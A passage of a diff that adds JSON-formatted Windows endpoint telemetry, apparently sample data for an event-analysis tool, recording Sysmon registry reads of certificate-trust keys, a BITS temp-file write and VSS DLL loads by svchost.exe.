"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "file", + "file_name": "BIT6BFA.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "file", + "file_name": "BIT6BFA.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "vssapi.dll", + "image_path": "C:\\Windows\\System32\\vssapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "vsstrace.dll", + "image_path": "C:\\Windows\\System32\\vsstrace.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 